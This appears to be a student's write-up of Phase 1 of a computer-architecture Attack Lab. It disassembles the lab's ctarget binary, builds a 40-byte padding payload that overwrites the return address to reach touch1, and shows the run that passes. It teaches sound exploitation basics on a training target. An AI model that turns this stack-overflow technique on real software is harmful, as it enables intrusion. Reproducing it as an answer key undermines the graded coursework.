Skip to main content

Attack Lab: Phase 1

Course WorkAttack LabComputer Organization and ArchitectureLess than 1 minuteAbout 130 words

Run
objdump --disassemble ctarget > ctarget.asm
Read File ctarget.asm
...
0000000000401b28 <getbuf>:
  401b28:	48 83 ec 28          	sub    $0x28,%rsp
...
0000000000401b3e <touch1>:
...
Write File phase-1.txt
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
3e 1b 40 00 00 00 00 00
Run
./hex2raw < phase-1.txt > phase-1.in
./ctarget -i phase-1.in
Terminal Output
Cookie: 0x3a9a6c2f
Touch1!: You called touch1()
Valid solution for level 1 with target ctarget
PASS: Sent exploit string to server to be validated.
NICE JOB!